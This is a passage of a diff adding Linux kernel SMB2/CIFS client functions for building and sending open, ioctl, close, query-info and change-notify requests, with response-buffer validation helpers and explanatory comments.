++	    *oplock == SMB2_OPLOCK_LEVEL_NONE)
++		req->RequestedOplockLevel = *oplock;
++	else if (!(server->capabilities & SMB2_GLOBAL_CAP_DIRECTORY_LEASING) &&
++		  (oparms->create_options & CREATE_NOT_FILE))
++		req->RequestedOplockLevel = *oplock; /* no srv lease support */
++	else {
++		rc = add_lease_context(server, iov, &n_iov,
++				       oparms->fid->lease_key, oplock);
++		if (rc)
++			return rc;
++	}
++
++	if (*oplock == SMB2_OPLOCK_LEVEL_BATCH) {
++		/* need to set Next field of lease context if we request it */
++		if (server->capabilities & SMB2_GLOBAL_CAP_LEASING) {
++			struct create_context *ccontext =
++			    (struct create_context *)iov[n_iov-1].iov_base;
++			ccontext->Next =
++				cpu_to_le32(server->vals->create_lease_size);
++		}
++
++		rc = add_durable_context(iov, &n_iov, oparms,
++					tcon->use_persistent);
++		if (rc)
++			return rc;
++	}
++
++	if (tcon->posix_extensions) {
++		if (n_iov > 2) {
++			struct create_context *ccontext =
++			    (struct create_context *)iov[n_iov-1].iov_base;
++			ccontext->Next =
++				cpu_to_le32(iov[n_iov-1].iov_len);
++		}
++
++		rc = add_posix_context(iov, &n_iov, oparms->mode);
++		if (rc)
++			return rc;
++	}
++
++	if (tcon->snapshot_time) {
++		cifs_dbg(FYI, "adding snapshot context\n");
++		if (n_iov > 2) {
++			struct create_context *ccontext =
++			    (struct create_context *)iov[n_iov-1].iov_base;
++			ccontext->Next =
++				cpu_to_le32(iov[n_iov-1].iov_len);
++		}
++
++		rc = add_twarp_context(iov, &n_iov, tcon->snapshot_time);
++		if (rc)
++			return rc;
++	}
++
++	if ((oparms->disposition != FILE_OPEN) && (oparms->cifs_sb)) {
++		bool set_mode;
++		bool set_owner;
++
++		if ((oparms->cifs_sb->mnt_cifs_flags & CIFS_MOUNT_MODE_FROM_SID) &&
++		    (oparms->mode != ACL_NO_MODE))
++			set_mode = true;
++		else {
++			set_mode = false;
++			oparms->mode = ACL_NO_MODE;
++		}
++
++		if (oparms->cifs_sb->mnt_cifs_flags & CIFS_MOUNT_UID_FROM_ACL)
++			set_owner = true;
++		else
++			set_owner = false;
++
++		if (set_owner | set_mode) {
++			if (n_iov > 2) {
++				struct create_context *ccontext =
++				    (struct create_context *)iov[n_iov-1].iov_base;
++				ccontext->Next = cpu_to_le32(iov[n_iov-1].iov_len);
++			}
++
++			cifs_dbg(FYI, "add sd with mode 0x%x\n", oparms->mode);
++			rc = add_sd_context(iov, &n_iov, oparms->mode, set_owner);
++			if (rc)
++				return rc;
++		}
++	}
++
++	if (n_iov > 2) {
++		struct create_context *ccontext =
++			(struct create_context *)iov[n_iov-1].iov_base;
++		ccontext->Next = cpu_to_le32(iov[n_iov-1].iov_len);
++	}
++	add_query_id_context(iov, &n_iov);
++
++	rqst->rq_nvec = n_iov;
++	return 0;
++}
++
++/* rq_iov[0] is the request and is released by cifs_small_buf_release().
++ * All other vectors are freed by kfree().
++ */
++void
++SMB2_open_free(struct smb_rqst *rqst)
++{
++	int i;
++
++	if (rqst && rqst->rq_iov) {
++		cifs_small_buf_release(rqst->rq_iov[0].iov_base);
++		for (i = 1; i < rqst->rq_nvec; i++)
++			if (rqst->rq_iov[i].iov_base != smb2_padding)
++				kfree(rqst->rq_iov[i].iov_base);
++	}
++}
++
++int
++SMB2_open(const unsigned int xid, struct cifs_open_parms *oparms, __le16 *path,
++	  __u8 *oplock, struct smb2_file_all_info *buf,
++	  struct create_posix_rsp *posix,
++	  struct kvec *err_iov, int *buftype)
++{
++	struct smb_rqst rqst;
++	struct smb2_create_rsp *rsp = NULL;
++	struct cifs_tcon *tcon = oparms->tcon;
++	struct cifs_ses *ses = tcon->ses;
++	struct TCP_Server_Info *server = cifs_pick_channel(ses);
++	struct kvec iov[SMB2_CREATE_IOV_SIZE];
++	struct kvec rsp_iov = {NULL, 0};
++	int resp_buftype = CIFS_NO_BUFFER;
++	int rc = 0;
++	int flags = 0;
++
++	cifs_dbg(FYI, "create/open\n");
++	if (!ses || !server)
++		return -EIO;
++
++	if (smb3_encryption_required(tcon))
++		flags |= CIFS_TRANSFORM_REQ;
++
++	memset(&rqst, 0, sizeof(struct smb_rqst));
++	memset(&iov, 0, sizeof(iov));
++	rqst.rq_iov = iov;
++	rqst.rq_nvec = SMB2_CREATE_IOV_SIZE;
++
++	rc = SMB2_open_init(tcon, server,
++			    &rqst, oplock, oparms, path);
++	if (rc)
++		goto creat_exit;
++
++	trace_smb3_open_enter(xid, tcon->tid, tcon->ses->Suid, oparms->path,
++		oparms->create_options, oparms->desired_access);
++
++	rc = cifs_send_recv(xid, ses, server,
++			    &rqst, &resp_buftype, flags,
++			    &rsp_iov);
++	rsp = (struct smb2_create_rsp *)rsp_iov.iov_base;
++
++	if (rc != 0) {
++		cifs_stats_fail_inc(tcon, SMB2_CREATE_HE);
++		if (err_iov && rsp) {
++			*err_iov = rsp_iov;
++			*buftype = resp_buftype;
++			resp_buftype = CIFS_NO_BUFFER;
++			rsp = NULL;
++		}
++		trace_smb3_open_err(xid, tcon->tid, ses->Suid,
++				    oparms->create_options, oparms->desired_access, rc);
++		if (rc == -EREMCHG) {
++			pr_warn_once("server share %s deleted\n",
++				     tcon->tree_name);
++			tcon->need_reconnect = true;
++		}
++		goto creat_exit;
++	} else if (rsp == NULL) /* unlikely to happen, but safer to check */
++		goto creat_exit;
++	else
++		trace_smb3_open_done(xid, rsp->PersistentFileId, tcon->tid, ses->Suid,
++				     oparms->create_options, oparms->desired_access);
++
++	atomic_inc(&tcon->num_remote_opens);
++	oparms->fid->persistent_fid = rsp->PersistentFileId;
++	oparms->fid->volatile_fid = rsp->VolatileFileId;
++	oparms->fid->access = oparms->desired_access;
++#ifdef CONFIG_CIFS_DEBUG2
++	oparms->fid->mid = le64_to_cpu(rsp->hdr.MessageId);
++#endif /* CIFS_DEBUG2 */
++
++	if (buf) {
++		buf->CreationTime = rsp->CreationTime;
++		buf->LastAccessTime = rsp->LastAccessTime;
++		buf->LastWriteTime = rsp->LastWriteTime;
++		buf->ChangeTime = rsp->ChangeTime;
++		buf->AllocationSize = rsp->AllocationSize;
++		buf->EndOfFile = rsp->EndofFile;
++		buf->Attributes = rsp->FileAttributes;
++		buf->NumberOfLinks = cpu_to_le32(1);
++		buf->DeletePending = 0;
++	}
++
++	smb2_parse_contexts(server, rsp, &oparms->fid->epoch,
++			    oparms->fid->lease_key, oplock, buf, posix);
++creat_exit:
++	SMB2_open_free(&rqst);
++	free_rsp_buf(resp_buftype, rsp);
++	return rc;
++}
++
++int
++SMB2_ioctl_init(struct cifs_tcon *tcon, struct TCP_Server_Info *server,
++		struct smb_rqst *rqst,
++		u64 persistent_fid, u64 volatile_fid, u32 opcode,
++		char *in_data, u32 indatalen,
++		__u32 max_response_size)
++{
++	struct smb2_ioctl_req *req;
++	struct kvec *iov = rqst->rq_iov;
++	unsigned int total_len;
++	int rc;
++	char *in_data_buf;
++
++	rc = smb2_ioctl_req_init(opcode, tcon, server,
++				 (void **) &req, &total_len);
++	if (rc)
++		return rc;
++
++	if (indatalen) {
++		/*
++		 * indatalen is usually small at a couple of bytes max, so
++		 * just allocate through generic pool
++		 */
++		in_data_buf = kmemdup(in_data, indatalen, GFP_NOFS);
++		if (!in_data_buf) {
++			cifs_small_buf_release(req);
++			return -ENOMEM;
++		}
++	}
++
++	req->CtlCode = cpu_to_le32(opcode);
++	req->PersistentFileId = persistent_fid;
++	req->VolatileFileId = volatile_fid;
++
++	iov[0].iov_base = (char *)req;
++	/*
++	 * If there is no input data, the size of the ioctl struct in the
++	 * protocol spec still includes a 1 byte data buffer. But if input
++	 * data is passed to the ioctl, we do not want to double count
++	 * that byte, so we do not send the dummy one byte of data in
++	 * iovec[0] when sending input data (in iovec[1]).
++	 */
++	if (indatalen) {
++		req->InputCount = cpu_to_le32(indatalen);
++		/* do not set InputOffset if no input data */
++		req->InputOffset =
++		       cpu_to_le32(offsetof(struct smb2_ioctl_req, Buffer));
++		rqst->rq_nvec = 2;
++		iov[0].iov_len = total_len - 1;
++		iov[1].iov_base = in_data_buf;
++		iov[1].iov_len = indatalen;
++	} else {
++		rqst->rq_nvec = 1;
++		iov[0].iov_len = total_len;
++	}
++
++	req->OutputOffset = 0;
++	req->OutputCount = 0; /* MBZ */
++
++	/*
++	 * In most cases max_response_size is set to 16K (CIFSMaxBufSize).
++	 * We could increase the default MaxOutputResponse, but that could
++	 * require more credits. Windows typically sets this smaller, but
++	 * for some ioctls it may be useful to allow the server to send
++	 * more. There is no point limiting what the server can send as
++	 * long as it fits in one credit. We cannot handle more than
++	 * CIFS_MAX_BUF_SIZE yet, but may want to raise this limit in the
++	 * future.
++	 * Note that for snapshot queries, servers like Azure expect the
++	 * first query to be minimal size (and just used to get the
++	 * number/size of previous versions) so the response size must be
++	 * specified as EXACTLY sizeof(struct snapshot_array), which is 16
++	 * when rounded up to a multiple of eight bytes. Currently that is
++	 * the only case where we set max response size smaller.
++	 */
++	req->MaxOutputResponse = cpu_to_le32(max_response_size);
++	req->hdr.CreditCharge =
++		cpu_to_le16(DIV_ROUND_UP(max(indatalen, max_response_size),
++					 SMB2_MAX_BUFFER_SIZE));
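++	/*
++	 * Illustrative credit arithmetic for the charge above (assumed
++	 * values, not from a real request): with SMB2_MAX_BUFFER_SIZE of
++	 * 64K, a small input and the usual 16K (CIFSMaxBufSize) response
++	 * cap give DIV_ROUND_UP(16384, 65536) = 1 credit, while a caller
++	 * asking for a 256K response would be charged
++	 * DIV_ROUND_UP(262144, 65536) = 4 credits.
++	 */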
++	/* always an FSCTL (for now) */
++	req->Flags = cpu_to_le32(SMB2_0_IOCTL_IS_FSCTL);
++
++	/* validate negotiate request must be signed - see MS-SMB2 3.2.5.5 */
++	if (opcode == FSCTL_VALIDATE_NEGOTIATE_INFO)
++		req->hdr.Flags |= SMB2_FLAGS_SIGNED;
++
++	return 0;
++}
++
++void
++SMB2_ioctl_free(struct smb_rqst *rqst)
++{
++	int i;
++	if (rqst && rqst->rq_iov) {
++		cifs_small_buf_release(rqst->rq_iov[0].iov_base); /* request */
++		for (i = 1; i < rqst->rq_nvec; i++)
++			if (rqst->rq_iov[i].iov_base != smb2_padding)
++				kfree(rqst->rq_iov[i].iov_base);
++	}
++}
++
++/*
++ *	SMB2 IOCTL is used for both IOCTLs and FSCTLs
++ */
++int
++SMB2_ioctl(const unsigned int xid, struct cifs_tcon *tcon, u64 persistent_fid,
++	   u64 volatile_fid, u32 opcode, char *in_data, u32 indatalen,
++	   u32 max_out_data_len, char **out_data,
++	   u32 *plen /* returned data len */)
++{
++	struct smb_rqst rqst;
++	struct smb2_ioctl_rsp *rsp = NULL;
++	struct cifs_ses *ses;
++	struct TCP_Server_Info *server;
++	struct kvec iov[SMB2_IOCTL_IOV_SIZE];
++	struct kvec rsp_iov = {NULL, 0};
++	int resp_buftype = CIFS_NO_BUFFER;
++	int rc = 0;
++	int flags = 0;
++
++	cifs_dbg(FYI, "SMB2 IOCTL\n");
++
++	if (out_data != NULL)
++		*out_data = NULL;
++
++	/* zero out returned data len, in case of error */
++	if (plen)
++		*plen = 0;
++
++	if (!tcon)
++		return -EIO;
++
++	ses = tcon->ses;
++	if (!ses)
++		return -EIO;
++
++	server = cifs_pick_channel(ses);
++	if (!server)
++		return -EIO;
++
++	if (smb3_encryption_required(tcon))
++		flags |= CIFS_TRANSFORM_REQ;
++
++	memset(&rqst, 0, sizeof(struct smb_rqst));
++	memset(&iov, 0, sizeof(iov));
++	rqst.rq_iov = iov;
++	rqst.rq_nvec = SMB2_IOCTL_IOV_SIZE;
++
++	rc = SMB2_ioctl_init(tcon, server,
++			     &rqst, persistent_fid, volatile_fid, opcode,
++			     in_data, indatalen, max_out_data_len);
++	if (rc)
++		goto ioctl_exit;
++
++	rc = cifs_send_recv(xid, ses, server,
++			    &rqst, &resp_buftype, flags,
++			    &rsp_iov);
++	rsp = (struct smb2_ioctl_rsp *)rsp_iov.iov_base;
++
++	if (rc != 0)
++		trace_smb3_fsctl_err(xid, persistent_fid, tcon->tid,
++				ses->Suid, 0, opcode, rc);
++
++	if ((rc != 0) && (rc != -EINVAL) && (rc != -E2BIG)) {
++		cifs_stats_fail_inc(tcon, SMB2_IOCTL_HE);
++		goto ioctl_exit;
++	} else if (rc == -EINVAL) {
++		if ((opcode != FSCTL_SRV_COPYCHUNK_WRITE) &&
++		    (opcode != FSCTL_SRV_COPYCHUNK)) {
++			cifs_stats_fail_inc(tcon, SMB2_IOCTL_HE);
++			goto ioctl_exit;
++		}
++	} else if (rc == -E2BIG) {
++		if (opcode != FSCTL_QUERY_ALLOCATED_RANGES) {
++			cifs_stats_fail_inc(tcon, SMB2_IOCTL_HE);
++			goto ioctl_exit;
++		}
++	}
++
++	/* check if caller wants to look at return data or just return rc */
++	if ((plen == NULL) || (out_data == NULL))
++		goto ioctl_exit;
++
++	/*
++	 * Although it is unlikely for rsp to be null while rc is unset,
++	 * adding the check below is slightly safer long term (and quiets
++	 * a Coverity warning)
++	 */
++	if (rsp == NULL) {
++		rc = -EIO;
++		goto ioctl_exit;
++	}
++
++	*plen = le32_to_cpu(rsp->OutputCount);
++
++	/* We check for obvious errors in the output buffer length and offset */
++	if (*plen == 0)
++		goto ioctl_exit; /* server returned no data */
++	else if (*plen > rsp_iov.iov_len || *plen > 0xFF00) {
++		cifs_tcon_dbg(VFS, "srv returned invalid ioctl length: %d\n", *plen);
++		*plen = 0;
++		rc = -EIO;
++		goto ioctl_exit;
++	}
++
++	if (rsp_iov.iov_len - *plen < le32_to_cpu(rsp->OutputOffset)) {
++		cifs_tcon_dbg(VFS, "Malformed ioctl resp: len %d offset %d\n", *plen,
++			le32_to_cpu(rsp->OutputOffset));
++		*plen = 0;
++		rc = -EIO;
++		goto ioctl_exit;
++	}
++
++	*out_data = kmemdup((char *)rsp + le32_to_cpu(rsp->OutputOffset),
++			    *plen, GFP_KERNEL);
++	if (*out_data == NULL) {
++		rc = -ENOMEM;
++		goto ioctl_exit;
++	}
++
++ioctl_exit:
++	SMB2_ioctl_free(&rqst);
++	free_rsp_buf(resp_buftype, rsp);
++	return rc;
++}
++
++/*
++ *   Individual callers to ioctl worker function follow
++ */
++
++int
++SMB2_set_compression(const unsigned int xid, struct cifs_tcon *tcon,
++		     u64 persistent_fid, u64 volatile_fid)
++{
++	int rc;
++	struct  compress_ioctl fsctl_input;
++	char *ret_data = NULL;
++
++	fsctl_input.CompressionState =
++			cpu_to_le16(COMPRESSION_FORMAT_DEFAULT);
++
++	rc = SMB2_ioctl(xid, tcon, persistent_fid, volatile_fid,
++			FSCTL_SET_COMPRESSION,
++			(char *)&fsctl_input /* data input */,
++			2 /* in data len */, CIFSMaxBufSize /* max out data */,
++			&ret_data /* out data */, NULL);
++
++	cifs_dbg(FYI, "set compression rc %d\n", rc);
++
++	return rc;
++}
++
++int
++SMB2_close_init(struct cifs_tcon *tcon, struct TCP_Server_Info *server,
++		struct smb_rqst *rqst,
++		u64 persistent_fid, u64 volatile_fid, bool query_attrs)
++{
++	struct smb2_close_req *req;
++	struct kvec *iov = rqst->rq_iov;
++	unsigned int total_len;
++	int rc;
++
++	rc = smb2_plain_req_init(SMB2_CLOSE, tcon, server,
++				 (void **) &req, &total_len);
++	if (rc)
++		return rc;
++
++	req->PersistentFileId = persistent_fid;
++	req->VolatileFileId = volatile_fid;
++	if (query_attrs)
++		req->Flags = SMB2_CLOSE_FLAG_POSTQUERY_ATTRIB;
++	else
++		req->Flags = 0;
++	iov[0].iov_base = (char *)req;
++	iov[0].iov_len = total_len;
++
++	return 0;
++}
++
++void
++SMB2_close_free(struct smb_rqst *rqst)
++{
++	if (rqst && rqst->rq_iov)
++		cifs_small_buf_release(rqst->rq_iov[0].iov_base); /* request */
++}
++
++int
++__SMB2_close(const unsigned int xid, struct cifs_tcon *tcon,
++	     u64 persistent_fid, u64 volatile_fid,
++	     struct smb2_file_network_open_info *pbuf)
++{
++	struct smb_rqst rqst;
++	struct smb2_close_rsp *rsp = NULL;
++	struct cifs_ses *ses = tcon->ses;
++	struct TCP_Server_Info *server = cifs_pick_channel(ses);
++	struct kvec iov[1];
++	struct kvec rsp_iov;
++	int resp_buftype = CIFS_NO_BUFFER;
++	int rc = 0;
++	int flags = 0;
++	bool query_attrs = false;
++
++	cifs_dbg(FYI, "Close\n");
++
++	if (!ses || !server)
++		return -EIO;
++
++	if (smb3_encryption_required(tcon))
++		flags |= CIFS_TRANSFORM_REQ;
++
++	memset(&rqst, 0, sizeof(struct smb_rqst));
++	memset(&iov, 0, sizeof(iov));
++	rqst.rq_iov = iov;
++	rqst.rq_nvec = 1;
++
++	/* check if we need to ask the server to return timestamps in the close response */
++	if (pbuf)
++		query_attrs = true;
++
++	trace_smb3_close_enter(xid, persistent_fid, tcon->tid, ses->Suid);
++	rc = SMB2_close_init(tcon, server,
++			     &rqst, persistent_fid, volatile_fid,
++			     query_attrs);
++	if (rc)
++		goto close_exit;
++
++	rc = cifs_send_recv(xid, ses, server,
++			    &rqst, &resp_buftype, flags, &rsp_iov);
++	rsp = (struct smb2_close_rsp *)rsp_iov.iov_base;
++
++	if (rc != 0) {
++		cifs_stats_fail_inc(tcon, SMB2_CLOSE_HE);
++		trace_smb3_close_err(xid, persistent_fid, tcon->tid, ses->Suid,
++				     rc);
++		goto close_exit;
++	} else {
++		trace_smb3_close_done(xid, persistent_fid, tcon->tid,
++				      ses->Suid);
++		/*
++		 * Note that we have to subtract 4 since struct
++		 * network_open_info has a final 4 byte pad that the close
++		 * response does not have
++		 */
++		if (pbuf)
++			memcpy(pbuf, (char *)&rsp->CreationTime, sizeof(*pbuf) - 4);
++	}
++
++	atomic_dec(&tcon->num_remote_opens);
++close_exit:
++	SMB2_close_free(&rqst);
++	free_rsp_buf(resp_buftype, rsp);
++
++	/* retry close in a worker thread if this one is interrupted */
++	if (is_interrupt_error(rc)) {
++		int tmp_rc;
++
++		tmp_rc = smb2_handle_cancelled_close(tcon, persistent_fid,
++						     volatile_fid);
++		if (tmp_rc)
++			cifs_dbg(VFS, "handle cancelled close fid 0x%llx returned error %d\n",
++				 persistent_fid, tmp_rc);
++	}
++	return rc;
++}
++
++int
++SMB2_close(const unsigned int xid, struct cifs_tcon *tcon,
++		u64 persistent_fid, u64 volatile_fid)
++{
++	return __SMB2_close(xid, tcon, persistent_fid, volatile_fid, NULL);
++}
++
++int
++smb2_validate_iov(unsigned int offset, unsigned int buffer_length,
++		  struct kvec *iov, unsigned int min_buf_size)
++{
++	unsigned int smb_len = iov->iov_len;
++	char *end_of_smb = smb_len + (char *)iov->iov_base;
++	char *begin_of_buf = offset + (char *)iov->iov_base;
++	char *end_of_buf = begin_of_buf + buffer_length;
++
++	if (buffer_length < min_buf_size) {
++		cifs_dbg(VFS, "buffer length %d smaller than minimum size %d\n",
++			 buffer_length, min_buf_size);
++		return -EINVAL;
++	}
++
++	/* check if beyond RFC1001 maximum length */
++	if ((smb_len > 0x7FFFFF) || (buffer_length > 0x7FFFFF)) {
++		cifs_dbg(VFS, "buffer length %d or smb length %d too large\n",
++			 buffer_length, smb_len);
++		return -EINVAL;
++	}
++
++	if ((begin_of_buf > end_of_smb) || (end_of_buf > end_of_smb)) {
++		cifs_dbg(VFS, "Invalid server response, bad offset to data\n");
++		return -EINVAL;
++	}
++
++	return 0;
++}
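++/*
++ * A worked example of the bounds check above (hypothetical numbers):
++ * for a response with iov_len = 200, offset = 150 and buffer_length =
++ * 100, end_of_buf = iov_base + 250 lands past end_of_smb = iov_base +
++ * 200, so the server-supplied offset/length pair is rejected with
++ * -EINVAL rather than letting a later memcpy read past the response.
++ */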
++
++/*
++ * If SMB buffer fields are valid, copy into temporary buffer to hold result.
++ * Caller must free buffer.
++ */
++int
++smb2_validate_and_copy_iov(unsigned int offset, unsigned int buffer_length,
++			   struct kvec *iov, unsigned int minbufsize,
++			   char *data)
++{
++	char *begin_of_buf = offset + (char *)iov->iov_base;
++	int rc;
++
++	if (!data)
++		return -EINVAL;
++
++	rc = smb2_validate_iov(offset, buffer_length, iov, minbufsize);
++	if (rc)
++		return rc;
++
++	memcpy(data, begin_of_buf, minbufsize);
++
++	return 0;
++}
++
++int
++SMB2_query_info_init(struct cifs_tcon *tcon, struct TCP_Server_Info *server,
++		     struct smb_rqst *rqst,
++		     u64 persistent_fid, u64 volatile_fid,
++		     u8 info_class, u8 info_type, u32 additional_info,
++		     size_t output_len, size_t input_len, void *input)
++{
++	struct smb2_query_info_req *req;
++	struct kvec *iov = rqst->rq_iov;
++	unsigned int total_len;
++	int rc;
++
++	rc = smb2_plain_req_init(SMB2_QUERY_INFO, tcon, server,
++				 (void **) &req, &total_len);
++	if (rc)
++		return rc;
++
++	req->InfoType = info_type;
++	req->FileInfoClass = info_class;
++	req->PersistentFileId = persistent_fid;
++	req->VolatileFileId = volatile_fid;
++	req->AdditionalInformation = cpu_to_le32(additional_info);
++
++	req->OutputBufferLength = cpu_to_le32(output_len);
++	if (input_len) {
++		req->InputBufferLength = cpu_to_le32(input_len);
++		/* total_len for smb query request is never close to le16 max */
++		req->InputBufferOffset = cpu_to_le16(total_len - 1);
++		memcpy(req->Buffer, input, input_len);
++	}
++
++	iov[0].iov_base = (char *)req;
++	/* 1 for Buffer */
++	iov[0].iov_len = total_len - 1 + input_len;
++	return 0;
++}
++
++void
++SMB2_query_info_free(struct smb_rqst *rqst)
++{
++	if (rqst && rqst->rq_iov)
++		cifs_small_buf_release(rqst->rq_iov[0].iov_base); /* request */
++}
++
++static int
++query_info(const unsigned int xid, struct cifs_tcon *tcon,
++	   u64 persistent_fid, u64 volatile_fid, u8 info_class, u8 info_type,
++	   u32 additional_info, size_t output_len, size_t min_len, void **data,
++		u32 *dlen)
++{
++	struct smb_rqst rqst;
++	struct smb2_query_info_rsp *rsp = NULL;
++	struct kvec iov[1];
++	struct kvec rsp_iov;
++	int rc = 0;
++	int resp_buftype = CIFS_NO_BUFFER;
++	struct cifs_ses *ses = tcon->ses;
++	struct TCP_Server_Info *server;
++	int flags = 0;
++	bool allocated = false;
++
++	cifs_dbg(FYI, "Query Info\n");
++
++	if (!ses)
++		return -EIO;
++	server = cifs_pick_channel(ses);
++	if (!server)
++		return -EIO;
++
++	if (smb3_encryption_required(tcon))
++		flags |= CIFS_TRANSFORM_REQ;
++
++	memset(&rqst, 0, sizeof(struct smb_rqst));
++	memset(&iov, 0, sizeof(iov));
++	rqst.rq_iov = iov;
++	rqst.rq_nvec = 1;
++
++	rc = SMB2_query_info_init(tcon, server,
++				  &rqst, persistent_fid, volatile_fid,
++				  info_class, info_type, additional_info,
++				  output_len, 0, NULL);
++	if (rc)
++		goto qinf_exit;
++
++	trace_smb3_query_info_enter(xid, persistent_fid, tcon->tid,
++				    ses->Suid, info_class, (__u32)info_type);
++
++	rc = cifs_send_recv(xid, ses, server,
++			    &rqst, &resp_buftype, flags, &rsp_iov);
++	rsp = (struct smb2_query_info_rsp *)rsp_iov.iov_base;
++
++	if (rc) {
++		cifs_stats_fail_inc(tcon, SMB2_QUERY_INFO_HE);
++		trace_smb3_query_info_err(xid, persistent_fid, tcon->tid,
++				ses->Suid, info_class, (__u32)info_type, rc);
++		goto qinf_exit;
++	}
++
++	trace_smb3_query_info_done(xid, persistent_fid, tcon->tid,
++				ses->Suid, info_class, (__u32)info_type);
++
++	if (dlen) {
++		*dlen = le32_to_cpu(rsp->OutputBufferLength);
++		if (!*data) {
++			*data = kmalloc(*dlen, GFP_KERNEL);
++			if (!*data) {
++				cifs_tcon_dbg(VFS,
++					"Error %d allocating memory for acl\n",
++					rc);
++				*dlen = 0;
++				rc = -ENOMEM;
++				goto qinf_exit;
++			}
++			allocated = true;
++		}
++	}
++
++	rc = smb2_validate_and_copy_iov(le16_to_cpu(rsp->OutputBufferOffset),
++					le32_to_cpu(rsp->OutputBufferLength),
++					&rsp_iov, dlen ? *dlen : min_len, *data);
++	if (rc && allocated) {
++		kfree(*data);
++		*data = NULL;
++		*dlen = 0;
++	}
++
++qinf_exit:
++	SMB2_query_info_free(&rqst);
++	free_rsp_buf(resp_buftype, rsp);
++	return rc;
++}
++
++int SMB2_query_info(const unsigned int xid, struct cifs_tcon *tcon,
++	u64 persistent_fid, u64 volatile_fid, struct smb2_file_all_info *data)
++{
++	return query_info(xid, tcon, persistent_fid, volatile_fid,
++			  FILE_ALL_INFORMATION, SMB2_O_INFO_FILE, 0,
++			  sizeof(struct smb2_file_all_info) + PATH_MAX * 2,
++			  sizeof(struct smb2_file_all_info), (void **)&data,
++			  NULL);
++}
++
++#if 0
++/* currently unused, as now we are doing compounding instead (see smb311_posix_query_path_info) */
++int
++SMB311_posix_query_info(const unsigned int xid, struct cifs_tcon *tcon,
++		u64 persistent_fid, u64 volatile_fid, struct smb311_posix_qinfo *data, u32 *plen)
++{
++	size_t output_len = sizeof(struct smb311_posix_qinfo) +
++			(sizeof(struct cifs_sid) * 2) + (PATH_MAX * 2);
++	*plen = 0;
++
++	return query_info(xid, tcon, persistent_fid, volatile_fid,
++			  SMB_FIND_FILE_POSIX_INFO, SMB2_O_INFO_FILE, 0,
++			  output_len, sizeof(struct smb311_posix_qinfo), (void **)&data, plen);
++	/* Note caller must free "data" (passed in above). It may be allocated in query_info call */
++}
++#endif
++
++int
++SMB2_query_acl(const unsigned int xid, struct cifs_tcon *tcon,
++	       u64 persistent_fid, u64 volatile_fid,
++	       void **data, u32 *plen, u32 extra_info)
++{
++	__u32 additional_info = OWNER_SECINFO | GROUP_SECINFO | DACL_SECINFO |
++				extra_info;
++	*plen = 0;
++
++	return query_info(xid, tcon, persistent_fid, volatile_fid,
++			  0, SMB2_O_INFO_SECURITY, additional_info,
++			  SMB2_MAX_BUFFER_SIZE, MIN_SEC_DESC_LEN, data, plen);
++}
++
++int
++SMB2_get_srv_num(const unsigned int xid, struct cifs_tcon *tcon,
++		 u64 persistent_fid, u64 volatile_fid, __le64 *uniqueid)
++{
++	return query_info(xid, tcon, persistent_fid, volatile_fid,
++			  FILE_INTERNAL_INFORMATION, SMB2_O_INFO_FILE, 0,
++			  sizeof(struct smb2_file_internal_info),
++			  sizeof(struct smb2_file_internal_info),
++			  (void **)&uniqueid, NULL);
++}
++
++/*
++ * CHANGE_NOTIFY Request is sent to get notifications on changes to a directory
++ * See MS-SMB2 2.2.35 and 2.2.36
++ */
++
++static int
++SMB2_notify_init(const unsigned int xid, struct smb_rqst *rqst,
++		 struct cifs_tcon *tcon, struct TCP_Server_Info *server,
++		 u64 persistent_fid, u64 volatile_fid,
++		 u32 completion_filter, bool watch_tree)
++{
++	struct smb2_change_notify_req *req;
++	struct kvec *iov = rqst->rq_iov;
++	unsigned int total_len;
++	int rc;
++
++	rc = smb2_plain_req_init(SMB2_CHANGE_NOTIFY, tcon, server,
++				 (void **) &req, &total_len);
++	if (rc)
++		return rc;
++
++	req->PersistentFileId = persistent_fid;
++	req->VolatileFileId = volatile_fid;
++	/* See note 354 of MS-SMB2, 64K max */
++	req->OutputBufferLength =
++		cpu_to_le32(SMB2_MAX_BUFFER_SIZE - MAX_SMB2_HDR_SIZE);
++	req->CompletionFilter = cpu_to_le32(completion_filter);
++	if (watch_tree)
++		req->Flags = cpu_to_le16(SMB2_WATCH_TREE);
++	else
++		req->Flags = 0;
++
++	iov[0].iov_base = (char *)req;
++	iov[0].iov_len = total_len;
++
++	return 0;
++}
++
++int
++SMB2_change_notify(const unsigned int xid, struct cifs_tcon *tcon,
++		u64 persistent_fid, u64 volatile_fid, bool watch_tree,
++		u32 completion_filter, u32 max_out_data_len, char **out_data,
++		u32 *plen /* returned data len */)
++{
++	struct cifs_ses *ses = tcon->ses;
++	struct TCP_Server_Info *server = cifs_pick_channel(ses);
++	struct smb_rqst rqst;
++	struct smb2_change_notify_rsp *smb_rsp;
++	struct kvec iov[1];
++	struct kvec rsp_iov = {NULL, 0};
++	int resp_buftype = CIFS_NO_BUFFER;
++	int flags = 0;
++	int rc = 0;
++
++	cifs_dbg(FYI, "change notify\n");
++	if (!ses || !server)
++		return -EIO;
++
++	if (smb3_encryption_required(tcon))
++		flags |= CIFS_TRANSFORM_REQ;
++
++	memset(&rqst, 0, sizeof(struct smb_rqst));
++	memset(&iov, 0, sizeof(iov));
++	if (plen)
++		*plen = 0;
++
++	rqst.rq_iov = iov;
++	rqst.rq_nvec = 1;
++
++	rc = SMB2_notify_init(xid, &rqst, tcon, server,
++			      persistent_fid, volatile_fid,
++			      completion_filter, watch_tree);
++	if (rc)
++		goto cnotify_exit;
++
++	trace_smb3_notify_enter(xid, persistent_fid, tcon->tid, ses->Suid,
++				(u8)watch_tree, completion_filter);
++	rc = cifs_send_recv(xid, ses, server,
++			    &rqst, &resp_buftype, flags, &rsp_iov);
++
++	if (rc != 0) {
++		cifs_stats_fail_inc(tcon, SMB2_CHANGE_NOTIFY_HE);
++		trace_smb3_notify_err(xid, persistent_fid, tcon->tid, ses->Suid,
++				(u8)watch_tree, completion_filter, rc);
++	} else {
++		trace_smb3_notify_done(xid, persistent_fid, tcon->tid,
++			ses->Suid, (u8)watch_tree, completion_filter);
++		/* validate that notify information is plausible */
++		if ((rsp_iov.iov_base == NULL) ||
++		    (rsp_iov.iov_len < sizeof(struct smb2_change_notify_rsp)))
++			goto cnotify_exit;
++
++		smb_rsp = (struct smb2_change_notify_rsp *)rsp_iov.iov_base;
++
++		smb2_validate_iov(le16_to_cpu(smb_rsp->OutputBufferOffset),
++				le32_to_cpu(smb_rsp->OutputBufferLength), &rsp_iov,
++				sizeof(struct file_notify_information));
++
++		*out_data = kmemdup((char *)smb_rsp + le16_to_cpu(smb_rsp->OutputBufferOffset),
++				le32_to_cpu(smb_rsp->OutputBufferLength), GFP_KERNEL);
++		if (*out_data == NULL) {
